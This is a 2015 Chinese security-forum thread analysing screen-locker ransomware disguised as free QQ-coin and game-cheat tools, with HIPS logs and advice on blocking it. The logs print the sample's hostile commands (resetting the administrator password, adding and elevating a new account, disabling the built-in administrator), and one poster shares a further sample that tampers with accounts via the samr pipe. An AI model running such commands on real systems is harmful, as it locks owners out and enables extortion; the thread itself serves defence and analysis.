[2015.4.25]敲竹杠样本，可以来分析密码

zhousulin5

2015-4-28 16:50:25    创建新进程    阻止
进程: c:\downloads\免费领q币(密码：123)\免费领q币.exe
目标: c:\windows\system32\net.exe
命令行: net user administrator 4Y4g9/ek9cwdwkRr3A==
规则: [应用程序组]全局允许 -> [子应用程序]关注的系统程序 -> [应用程序]c:\windows\system32\net.exe

2015-4-28 16:50:25    创建新进程    阻止
进程: c:\downloads\免费领q币(密码：123)\免费领q币.exe
目标: c:\windows\system32\net.exe
命令行: net user 2015428165025 4Y4g9/ek9cwdwkRr3A== /add
规则: [应用程序组]全局允许 -> [子应用程序]关注的系统程序 -> [应用程序]c:\windows\system32\net.exe

2015-4-28 16:50:25    创建新进程    阻止
进程: c:\downloads\免费领q币(密码：123)\免费领q币.exe
目标: c:\windows\system32\net.exe
命令行: net localgroup administrators 2015428165025 /add
规则: [应用程序组]全局允许 -> [子应用程序]关注的系统程序 -> [应用程序]c:\windows\system32\net.exe

2015-4-28 16:50:25    创建新进程    阻止
进程: c:\downloads\免费领q币(密码：123)\免费领q币.exe
目标: c:\windows\system32\net.exe
命令行: net user administrator /active:no
规则: [应用程序组]全局允许 -> [子应用程序]关注的系统程序 -> [应用程序]c:\windows\system32\net.exe

学雷锋做人

zhousulin5 发表于 2015-4-28 16:52
2015-4-28 16:50:25    创建新进程    阻止
进程: c:\downloads\免费领q币(密码：123)\免费领q币.exe
目 ...

毫无意义，请看靠后的楼层

zhousulin5

学雷锋做人 发表于 2015-4-28 17:23
毫无意义，请看靠后的楼层

打net的主意，也毫无意义。

学雷锋做人

zhousulin5 发表于 2015-4-28 17:28
打net的主意，也毫无意义。

要是谁都能够这样子的话，你觉得敲竹杠还会传播范围这么大吗？你觉得你这样有意义？别人中招了，你也帮不上，样本里不带密码，这个是关键问题，小白为了玩个外{过}{滤}挂，刷Q币等等，把杀软关了都不带考虑的，去病毒吧找那个电脑被锁的帖子，被锁的人每天都有，net本身就是通过创建进程CMD来执行的，间接通过API修改，拦截创建进程这个就能解决。你可以尝试看看API直接修改开机密码的敲竹杠，翻我以前发的帖子，目前国内的多数杀软已经针对NetUserSetInfo这个API进行了防护，如果你用MD的话，可以说秒过

zhousulin5

学雷锋做人 发表于 2015-4-28 17:33
要是谁都能够这样子的话，你觉得敲竹杠还会传播范围这么大吗？你觉得你这样有意义？别人中招了，你也帮不 ...

你不是叫来分析密码吗，我这里贴的东西就是一眼就能看到密码。”算法“这些唬人的东西可以放一边了。
说实话，本贴里我也没有看到你为那些中招的帮到了什么，能看到的就是你在展示自己的高明思路：多么复杂的用户名和密码。
而我展示的也是一种思路，拒绝别人用net来敲诈的思路，只不过用的工具是MD而已。至于你以前的帖子，我相信也帮不了那些中招的人，因为你没有在帖子里告诉别人怎样可以获取密码，你做的事情就是吓唬人。
很想看看你说的秒过MD的样本长什么样子。

学雷锋做人

zhousulin5 发表于 2015-4-29 17:51
你不是叫来分析密码吗，我这里贴的东西就是一眼就能看到密码。”算法“这些唬人的东西可以放一边了。
...

1.那我今天就让见识短浅的人知道这世界有多么大(双击看看能不能找出密码，能不能拦截密码修改，密码：infected)，重启后看结果
2.并没有存在什么吓唬人，我帮助解决敲竹杠的人有200多人，具体可以去毒吧看电脑被锁的帖子，从后面30页就能看到我，百度ID与卡饭ID是一样的，我展示的是我的一种思路，固定密码时代已经过去，算法吓唬人？无知才吓唬人，你连了解都不了解清楚就跑来瞎评论，会玩MD就代表了解敲竹杠么？那些逆向分析工程师怎么不像你一样？

zhousulin5

学雷锋做人 发表于 2015-4-29 18:12
1.那我今天就让见识短浅的人知道这世界有多么大(双击看看能不能找出密码，能不能拦截密码修改，密码：i ...

我确实不了解敲竹杠。
在运行样本并重启了之后，才来确认我的MD也确实没有被这个样本秒过。也试过了让它破坏，发现这个样本其实还不错，并没有去破坏隐藏的administrator账户。要防止被改账户，下面这两条记录是关键，只要阻止了其中一条就行了。
也同意你说的，通过系统API的敲竹杠，MD看不到样本的密码。再次运行了你的样本，确实，你设计密码和账户名的思路非常强大。

2015-5-20 14:53:07    加载动态链接库    允许
进程: c:\downloads\秒过md的敲竹杠\冒险岛online吸怪吸物.exe
目标: c:\windows\system32\samlib.dll
规则: [应用程序]c:\downloads\秒过md的敲竹杠\冒险岛online吸怪吸物.exe -> [动态链接库]c:\windows\system32\samlib.dll

2015-5-20 14:53:07    修改文件    阻止
进程: c:\downloads\秒过md的敲竹杠\冒险岛online吸怪吸物.exe
目标: \Device\NamedPipe\samr
规则: [应用程序]?:\* -> [文件]\device\namedpipe\samr


最后来说下HIPS的用户怎么来应对这些已知和未知的改用户密码的敲竹杠，已知的是两个途径，一是批处理调用net user ，二是命名管道samr（加载库文件samlib.dll也算在这个途径里）。另外，可以严防其他进程重启系统，只要在重启系统前发现被运行了敲竹杠，先解决掉敲竹杠的进程避免被它继续破坏，然后建立一个新的管理员账户，重启后，这个新的管理员账户就在你的控制中，你可以从容不迫的将被破坏的账户名和密码改回来。